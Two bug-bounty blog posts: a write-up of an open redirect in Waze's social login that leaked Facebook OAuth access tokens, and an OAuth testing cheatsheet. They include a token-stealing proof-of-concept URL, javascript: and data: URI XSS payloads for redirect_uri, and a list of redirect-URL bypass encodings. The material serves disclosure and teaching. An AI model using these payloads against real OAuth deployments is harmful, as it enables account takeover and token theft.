Google VRP : oAuth token stealing.

Hey guys!ย hope you all doing well :), In June/July i decided to hunt on Google Products, As Google have almost everything in scope so i gone though list of Google products/fully integrated acquisitions. ( https://www.google.com/intl/en/about/products/ ), Waze is one of Google’s Fully integrated acquisitions (There’s difference b/w integrated and non-integrated). So i decided to give it a try ๐Ÿ™‚

I was looking at Waze iOS app and there was an option to login with Twitter, Show i started capturing requests, The URL was like this;

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this, feeling lazy to checkout again :P)

The flow works in same manner like `Authorization Code flow` as Twitter don’t have `Implicit flow` (as far as i know)

1 – GET Request toย http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 – 302 Response toย https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this

session_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

Luckily yes it was vulnerable to open redirect we won the battle already ๐Ÿ˜€ but wait we’re working with twitter `oauth_veriifier` which is not very usable from attacker perspective. Also twitter requires us to authorize app everytime :/

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxย looking at ‘id’ , seems some more social connect possible, so i checked out android app as well and found facebook, linkedin are also there. Started testing on android, the flow for Facebook was completely different here. I started fuzzing around the old url, tried to replace Twitter to Facebook.

GET Request –ย http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response – 500 Error ๐Ÿ™

But wait i seen many apps working in this pattern /social/*connection_name*/connect , Lets give it a try.

GET –ย http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response -302 :DDDDD,

Changed ?redirect=http://harshjaiswal.com ย and response_type=token,signed_request

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events

Response –

http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=688

Although this was a fully integrated acq. i got less bounty ๐Ÿ˜› as they still consider it as acquition FOR bounty purposes ๐Ÿ™

But its okay! atleast i learned one thing, If they don’t give you endpoint, try to guess it 3:)

I hope you like it. ๐Ÿ™‚

Cheatsheet : Open Authentication – oAuth

Hey guys! I hope you all doing well, So today we’re going to discuss about oAuth and its bad implantation ๐Ÿ™‚

– What is oAuth ?

– IOAuth 2 is an authorization framework that enables applications to obtain limited access to user accounts on an HTTP service, such as Facebook, GitHub, and DigitalOcean. It works by delegating user authentication to the service that hosts the user account, and authorizing third-party applications to access the user account. OAuth 2 provides authorization flows for web and desktop applications, and mobile devices.

Visit https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2 (a must read) and learn oauth working before starting testing in it ๐Ÿ™‚ 


What’re the common bugs left in oAuth implantation ?

– XSS
– Redirect URL bypass
– CSRF
– ClickJacking 

1 – XSS 

It is possible to get both reflective and stored XSS using oAuth in developers portal of your target ๐Ÿ™‚
lets discuss how it is possible, Sometimes the value for “redirect url” is filtered for http(s) links only and hence you fail to add javascript:alert(10) in redirect url but this can be bypassed if it is not properly validating .

Payload : javascript://https://attacker.com/?z=%0Aalert(1)

Description :
As mention in previous post;
javascript:                        – Javascript’s pseduo protocol/schema
//                                       – Begins a single line comment in js
https://google.com/?aaaa – comment itself
%0a                                  – Intiate a new line which ends the single line comment
alert(1)                             – a valid javascript’s predefined function

Now this can trick the url validation and accepts this value in redirect url, now you can use

https://app.target.com/v1/oauth/authorize?response_type=code&client_id=xxxxxx-xxxxx
&redirect_uri=javascript://https://attacker.com/?z=%0Aalert(1)&scope=read write&state=kkkk

And bhoom XSS’ed after client app grant access, but wait what more malicious you can do here is stealing the access token given by Authorization Server. ๐Ÿ™‚

There is another way for XSS is using, data uri
You can give a try to : data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= in redirect url value ๐Ÿ™‚ it may work too.

http://www.paulosyibelo.com/2016/08/instagram-stored-oauth-xss.html (His blog is awesome ๐Ÿ˜‰ )

2 – Redirect URL bypass

Now this one is really vast,  what if you can bypass the redirect url set by developer ? that would be awesome cause you can again steal access token ๐Ÿ˜‰

http://example.com is set by developer then you can bypass it if the oauth implantation is not configured well from bypasses,
some of the good bypasses are following

Source : http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html

  • http://example.com%2f%2f.victim.com
  • http://example.com%5c%5c.victim.com
  • http://example.com%3F.victim.com
  • http://example.com%23.victim.com
  • http://victim.com:80%40example.com
  • http://victim.com%2eexample.com

Must read : http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html (Awesome)

Another must read : http://www.nirgoldshlager.com/2013/03/how-i-hacked-any-facebook-accountagain.html (Mind blown)

3 – CSRF 

Client app approval page where you grant access to a client app sometimes vulnerable to CSRF which can be used by attacker to force victim to approve attackers app with some dangereous scope access.

3 – ClickJacking 

Client app approval page where you grant access to a client app sometimes vulnerable to ClickJacking which can be used by attacker to trick victim to approve attackers app with some dangereous scope access. Recently my 2 bugs got validated same like this ๐Ÿ˜‰ 

This are just some common issues there are many issues left in oauth implantation find out them ๐Ÿ˜€ and make money ๐Ÿ˜‰